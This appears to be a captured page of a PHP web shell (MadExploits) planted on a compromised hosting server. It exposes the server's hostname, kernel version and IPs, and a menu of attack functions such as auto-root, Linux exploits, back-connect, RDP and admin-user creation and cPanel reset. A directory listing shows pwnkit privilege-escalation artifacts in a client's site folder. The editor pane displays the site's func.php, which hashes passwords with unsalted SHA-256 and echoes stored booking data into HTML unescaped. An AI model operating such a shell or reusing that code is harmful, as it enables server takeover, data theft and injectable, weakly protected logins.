Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.218.220.243
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
pm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auth.php
2.73
KB
-rw-r--r--
db.php
448
B
-rw-r--r--
func.php
5.27
KB
-rw-r--r--
process-booking.php
3.31
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : func.php
<?php // Include the database connection file require_once('db.php'); // Function to generate CSRF token function generateCSRFToken() { $token = bin2hex(random_bytes(32)); $_SESSION['csrf_token'] = $token; return $token; } // Function to validate CSRF token function validateCSRFToken($token) { return isset($_SESSION['csrf_token']) && hash_equals($_SESSION['csrf_token'], $token); } // Inside the authenticateUser function in func.php // Inside the authenticateUser function in func.php function authenticateUser($username, $password) { // Get the database connection $conn = connectToDatabase(); // Fetch hashed password and salt from the database $query = "SELECT password FROM user WHERE username = ?"; $stmt = mysqli_prepare($conn, $query); // Check if the prepared statement was successful if ($stmt === false) { die('Error preparing statement: ' . mysqli_error($conn)); } mysqli_stmt_bind_param($stmt, "s", $username); // Check if the parameter binding was successful if (mysqli_stmt_execute($stmt)) { mysqli_stmt_bind_result($stmt, $hashed_password); // Check if the user exists if (mysqli_stmt_fetch($stmt)) { // Debugging messages // var_dump($username, $password, $hashed_password); // Validate the password $input_password_hashed = hash('sha256', $password); if (hash_equals($hashed_password, $input_password_hashed)) { // Passwords match, authentication successful return true; } else { // Passwords do not match echo '<h1 style="color:red;">Invalid username or password.</h1>'; } } else { // User does not exist echo '<h1 style="color:red;">User not found.</h1>'; } } else { // Execution of prepared statement failed die('Error executing statement: ' . mysqli_error($conn)); } // Authentication failed return false; } // Function to create a new user function createUser($username, $password) { // Get the database connection $conn = connectToDatabase(); // Generate a unique salt for the user // $salt = bin2hex(random_bytes(16)); // Hash the password with the salt $hashed_password = hash('sha256', $password); // Insert the new user into the database $query = "INSERT INTO user (username, password) VALUES (?, ?)"; $stmt = mysqli_prepare($conn, $query); // Check if the prepared statement was successful if ($stmt === false) { die('Error preparing statement: ' . mysqli_error($conn)); } mysqli_stmt_bind_param($stmt, "ss", $username, $hashed_password); // Check if the parameter binding was successful if (mysqli_stmt_execute($stmt)) { // User creation successful return true; } else { // User creation failed die('Error executing statement: ' . mysqli_error($conn)); } } // Function to save booking data function saveBookingData($name, $email, $phone, $location, $service, $date) { // Validate the form data (you may add additional validation if needed) // Get the database connection $conn = connectToDatabase(); // Prepare and execute the SQL query to insert data into the "records" table $query = "INSERT INTO records (name, email, phone, location, service, date, added) VALUES (?, ?, ?, ?, ?, ?, NOW())"; $stmt = mysqli_prepare($conn, $query); // Check if the prepared statement was successful if ($stmt === false) { die('Error preparing statement: ' . mysqli_error($conn)); } // Bind parameters and execute the statement mysqli_stmt_bind_param($stmt, "ssssss", $name, $email, $phone, $location, $service, $date); // Check if the parameter binding was successful if (mysqli_stmt_execute($stmt)) { // Data insertion successful // echo "<h1 style='color:green;'>Data saved successfully!</h1>"; } else { // Data insertion failed echo '<h1 style="color:green;">Error executing statement: ' .mysqli_error($conn).'</h1>'; } // Close the statement and connection mysqli_stmt_close($stmt); mysqli_close($conn); } // Function to fetch records from the database function fetchRecords() { // Get the database connection $conn = connectToDatabase(); // Perform the SQL query to fetch records $query = "SELECT name, email, phone, location, service, date FROM records"; $result = mysqli_query($conn, $query); // Check if the query was successful if ($result) { // Check if there are any records if (mysqli_num_rows($result) > 0) { // Output data of each row $i = 1; while ($row = mysqli_fetch_assoc($result)) { echo "<tr>"; echo "<td class='text-center'>" . $i . "</td>"; echo "<td>" . $row["name"] . "</td>"; echo "<td>" . $row["email"] . "</td>"; echo "<td>" . $row["phone"] . "</td>"; // echo "<td>" . $row["location"] . "</td>"; // echo "<td>" . $row["service"] . "</td>"; // echo "<td>" . $row["date"] . "</td>"; echo "</tr>"; $i++; } } else { // No records found echo "<tr><td colspan='6'>No records found</td></tr>"; } // Free the result set mysqli_free_result($result); } else { // Query failed die('Error executing query: ' . mysqli_error($conn)); } // Close the database connection mysqli_close($conn); } ?>
Close
